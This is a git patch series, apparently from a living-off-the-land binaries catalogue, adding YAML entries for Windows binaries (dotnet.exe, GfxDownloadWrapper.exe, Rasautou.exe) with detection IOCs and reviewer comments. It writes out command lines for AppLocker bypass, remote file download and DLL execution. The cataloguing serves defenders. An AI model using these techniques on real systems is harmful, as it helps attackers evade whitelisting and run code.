From 5cb17cfb26e281eb40d51a8a2bcde4914cb4abc1 Mon Sep 17 00:00:00 2001 From: Ayush Sahay <47629256+felamos@users.noreply.github.com> Date: Wed, 11 Dec 2019 15:53:12 +0530 Subject: [PATCH 01/96] Create dotnet.yml --- yml/OtherMSBinaries/dotnet.yml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 yml/OtherMSBinaries/dotnet.yml
diff --git a/yml/OtherMSBinaries/dotnet.yml b/yml/OtherMSBinaries/dotnet.yml
new file mode 100644
index 0000000..b647d97
--- /dev/null
+++ b/yml/OtherMSBinaries/dotnet.yml
@@ -0,0 +1,31 @@
+---
+Name: dotnet.exe
+Description: dotnet.exe comes with .NET Framework
+Author: 'felamos'
+Created: '2019-11-12'
+Commands:
+ - Command: dotnet.exe [PATH_TO_DLL]
+ Description: dotnet.exe will execute any dll even if applocker is enabled.
+ Category: AWL Bypass
+ Privileges: User
+ MitreID: T1218
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+ OperatingSystem: Windows 7 and up with .NET installed
+ - Command: dotnet.exe [PATH_TO_DLL]
+ Description: dotnet.exe will execute any DLL.
+ Usecase: Execute DLL
+ Category: Execute
+ Privileges: User
+ MitreID: T1218
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+ OperatingSystem: Windows 7 and up with .NET installed
+Full_Path:
+ - Path: 'C:\Program Files\dotnet\dotnet.exe'
+Detection:
+ - IOC: dotnet.exe spawned an unknown process
+Resources:
+ - Link: https://twitter.com/_felamos/status/1204705548668555264
+Acknowledgement:
+ - Person: felamos
+ Handle: '@_felamos'
+---
From a057cf2420133683eb48af119c8ee100ef3cfa1c Mon Sep 17 00:00:00 2001
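Review bot: The two `Commands` entries are byte-identical (`dotnet.exe [PATH_TO_DLL]`) and only the second carries a `Usecase:`; either give the AWL Bypass entry its own `Usecase:` line or merge the two into one entry that lists both categories, otherwise the file reads as one technique recorded twice. `Description: dotnet.exe comes with .NET Framework` looks wrong: the entry's own `Full_Path` is `C:\Program Files\dotnet\dotnet.exe`, which as far as I know is the .NET Core / .NET SDK host rather than part of the .NET Framework — suggest `Description: dotnet.exe is the .NET Core / .NET SDK host and will load a DLL passed on the command line`. The `Detection` IOC `dotnet.exe spawned an unknown process` does not match the behaviour described (loading a DLL); a more direct IOC is `dotnet.exe invoked with a DLL path outside the installed SDK directory`. `Created: '2019-11-12'` may be a transposed form of the commit date (11 Dec 2019) and is worth confirming, and `MitreLink` uses the legacy `wiki/Technique/` URL form while later entries in this series use `https://attack.mitre.org/techniques/<ID>/`.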
From: jesgal <59289295+jesgal@users.noreply.github.com> Date: Fri, 27 Dec 2019 17:02:34 +0100 Subject: [PATCH 02/96] Create GfxDownloadWrapper.yml GfxDownloadWrapper.exe downloads the content that returns and writes it to the file . The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". --- yml/OSBinaries/GfxDownloadWrapper.yml | 176 ++++++++++++++++++++++++++ 1 file changed, 176 insertions(+) create mode 100644 yml/OSBinaries/GfxDownloadWrapper.yml diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml new file mode 100644 index 0000000..1ddb00e --- /dev/null +++ b/yml/OSBinaries/GfxDownloadWrapper.yml 
@@ -0,0 +1,176 @@ +Name: GfxDownloadWrapper.exe +Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path. +Author: Jesus Galvez +Created: Jesus Galvez +Commands: + - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "" "" + Description: GfxDownloadWrapper.exe downloads the content that returns and writes it to the file . The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". + Usecase: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_5fc14233495bec91\GfxDownloadWrapper.exe "http://127.0.0.1:8005" "%temp%\test" + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/techniques/T1105/ + OperatingSystem: Windows 10, Windows 7 +Full_Path: + - Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\ + - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\ + - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\ + - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\ + - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\ + - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\ + - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\ + - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\ + - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\ + - Path: 
c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\ + - Path: 
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\ + - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\ + - Path: 
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\ + - Path: 
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\ + - Path: 
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\ + - Path: c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\ + - Path: 
c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\ + - Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\ + - Path: c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\ + - Path: c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\ + - Path: c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\ + - Path: c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\ + - Path: c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\ + - Path: c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\ + - Path: c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\ + - Path: c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\ + - Path: c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\ + - Path: c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\ + - Path: c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\ + - Path: c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\ + - Path: c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\ + - Path: c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\ + - Path: c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\ + - Path: c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\ + - Path: c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\ + - Path: c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\ + - Path: c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\ + - Path: 
c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\ + - Path: c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\ + - Path: c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\ + - Path: c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\ + - Path: c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\ + - Path: c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\ + - Path: c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\ + - Path: c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\ + - Path: c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\ + - Path: c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\ + - Path: c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\ + - Path: c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\ + - Path: c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\ + - Path: c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\ + - Path: c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\ + - Path: c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\ + - Path: c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\ + - Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\ + - Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\ + - Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\ +Detection: + - IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com. 
+Resources: + - Link: https://www.sothis.tech/author/jgalvez/ +Acknowledgement: + - Person: Jesus Galvez From c9e608ce0f63cbcac9c2b5b264ea7218772aff44 Mon Sep 17 00:00:00 2001 From: jesgal <59289295+jesgal@users.noreply.github.com> Date: Fri, 27 Dec 2019 17:11:30 +0100 Subject: [PATCH 03/96] Update GfxDownloadWrapper.yml --- yml/OSBinaries/GfxDownloadWrapper.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml index 1ddb00e..98accb6 100644 --- a/yml/OSBinaries/GfxDownloadWrapper.yml +++ b/yml/OSBinaries/GfxDownloadWrapper.yml @@ -10,7 +10,7 @@ Commands: Privileges: User MitreID: T1105 MitreLink: https://attack.mitre.org/techniques/T1105/ - OperatingSystem: Windows 10, Windows 7 + OperatingSystem: Windows 10 Full_Path: - Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\ - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\ From e1b36a25bd4fcd79154f65c2da57fba1a9f5eb1b Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 7 Jan 2020 08:37:36 +0100 Subject: [PATCH 04/96] Rename dotnet.yml to Dotnet.yml --- yml/OtherMSBinaries/{dotnet.yml => Dotnet.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename yml/OtherMSBinaries/{dotnet.yml => Dotnet.yml} (100%) diff --git a/yml/OtherMSBinaries/dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml similarity index 100% rename from yml/OtherMSBinaries/dotnet.yml rename to yml/OtherMSBinaries/Dotnet.yml From 7030e009297f74c68f29e0a60a296580c696e51c Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 7 Jan 2020 08:40:24 +0100 Subject: [PATCH 05/96] Capitalized dotnet name --- yml/OtherMSBinaries/Dotnet.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index b647d97..5475947 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml 
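Review bot: `Created: Jesus Galvez` holds the author's name where the schema expects a date (compare `Created: '2019-11-12'` in dotnet.yml earlier in this series); it should be the creation date, e.g. `Created: '2019-12-27'` from the commit. The 170-odd `Full_Path` entries are driver-store directories ending in `\` with no `GfxDownloadWrapper.exe` file name, each carrying an install-specific hash suffix, so none of them is a path a reader can verify on another machine and the list can never be complete; one entry with a labelled placeholder such as `C:\Windows\System32\DriverStore\FileRepository\<inf_name>_amd64_<hash>\GfxDownloadWrapper.exe` would serve detection engineers better. The `Detection` line is a useful baseline but is phrased as a description rather than an indicator; `IOC: GfxDownloadWrapper.exe requesting a URL whose host is not gameplayapi.intel.com` makes it directly usable.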
@@ -1,5 +1,5 @@ --- -Name: dotnet.exe +Name: Dotnet.exe Description: dotnet.exe comes with .NET Framework Author: 'felamos' Created: '2019-11-12' From 22ef6bfc63a338184f4ad5d8c6fed3ea4c4d8064 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 7 Jan 2020 08:45:25 +0100 Subject: [PATCH 06/96] Added additional paths to CL_MutexVerifiers.ps1 - input from @shilpeshTrivedi --- yml/OSScripts/CL_mutexverifiers.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 06bdf24..1916397 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -16,6 +16,8 @@ Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 + - Path: C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1 + - Path: C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1 Code_Sample: - Code: Detection: From 71aec7465be671e37dad5b8df0c5dd9bba57fc59 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 7 Jan 2020 09:03:42 +0100 Subject: [PATCH 07/96] Minor adjustments to GfxDownloadWrapper.yml --- yml/OSBinaries/GfxDownloadWrapper.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml index 98accb6..a6ed7e4 100644 --- a/yml/OSBinaries/GfxDownloadWrapper.yml +++ b/yml/OSBinaries/GfxDownloadWrapper.yml @@ -1,3 +1,4 @@ +--- Name: GfxDownloadWrapper.exe Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path. Author: Jesus Galvez @@ -174,3 +175,5 @@ Resources: - Link: https://www.sothis.tech/author/jgalvez/ Acknowledgement: - Person: Jesus Galvez + Handle: +--- From ecc94c2d09744f9372a656371cd902866422effc Mon Sep 17 00:00:00 2001 
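Review bot: In the CL_mutexverifiers.yml hunk the context around the two added lines already lists `C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1` twice (hunk lines 16 and 18), so the `Full_Path` list now carries a duplicate next to the new `Video` and `Speech` entries; drop one of the two `WindowsUpdate` lines while this block is being touched.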
From: Oddvar Moe Date: Tue, 7 Jan 2020 09:08:13 +0100 Subject: [PATCH 08/96] Adjusted GfxDownloadWrapper --- yml/OSBinaries/GfxDownloadWrapper.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml index a6ed7e4..8a251aa 100644 --- a/yml/OSBinaries/GfxDownloadWrapper.yml +++ b/yml/OSBinaries/GfxDownloadWrapper.yml @@ -4,9 +4,9 @@ Description: Remote file download used by the Intel Graphics Control Panel, rece Author: Jesus Galvez Created: Jesus Galvez Commands: - - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "" "" - Description: GfxDownloadWrapper.exe downloads the content that returns and writes it to the file . The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". - Usecase: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_5fc14233495bec91\GfxDownloadWrapper.exe "http://127.0.0.1:8005" "%temp%\test" + - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" + Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". + Usecase: Download file from internet Category: Download Privileges: User MitreID: T1105 From 99b87fdc13216e23d7839643fc6fa0f93bf68381 Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Fri, 10 Jan 2020 22:52:15 -0600 Subject: [PATCH 09/96] Rasautou addition --- yml/OSBinaries/Rasautou.yml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 yml/OSBinaries/Rasautou.yml 
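Review bot: The rewritten `Command` keeps `igdlh64.inf_amd64_[0-9]+`, but the directory suffixes in `Full_Path` (and the `5fc14233495bec91` example the removed Usecase used) are lowercase hex, so the pattern never matches a real driver-store directory; use `igdlh64.inf_amd64_[0-9a-f]+` or a labelled `<hash>` placeholder. The new `Description` reads `downloads the content that returns URL and writes it to the file DESTINATION FILE PATH`, which is garbled and names a placeholder (`DESTINATION FILE PATH`) that differs from the `"URL" "DESTINATION FILE"` placeholders in the Command; suggest `Description: Downloads the content served at URL and writes it to DESTINATION FILE. The binary is signed by ...` with the signer list kept as is.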
diff --git a/yml/OSBinaries/Rasautou.yml b/yml/OSBinaries/Rasautou.yml
new file mode 100644
index 0000000..e9276d5
--- /dev/null
+++ b/yml/OSBinaries/Rasautou.yml
@@ -0,0 +1,27 @@
+---
+Name: Rasautou.exe
+Description: Windows Remote Access Dialer
+Author: 'Tony Lambert'
+Created: '2020-01-10'
+Commands:
+ - Command: rasautou -d powershell.dll -p powershell -a a -e e
+ Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
+ Usecase: Execute DLL code
+ Category: Execute
+ Privileges: User, Administrator in Windows 8
+ MitreID: T1218
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+ OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
+Full_Path:
+ - Path: C:\Windows\System32\rasautou.exe
+Code_Sample:
+- Code:
+Detection:
+ - IOC: rasautou.exe command line containing -d and -p
+Resources:
+ - Link: https://github.com/fireeye/DueDLLigence
+ - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
+Acknowledgement:
+ - Person: FireEye
+ Handle: '@FireEye'
+---
\ No newline at end of file
From e2f217c777817d01ab6636def476782b44e314bc Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Fri, 10 Jan 2020 22:53:34 -0600 Subject: [PATCH 10/96] ntdsutil addition --- yml/OtherMSBinaries/Ntdsutil.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OtherMSBinaries/Ntdsutil.yml
diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml
new file mode 100644
index 0000000..52d11df
--- /dev/null
+++ b/yml/OtherMSBinaries/Ntdsutil.yml
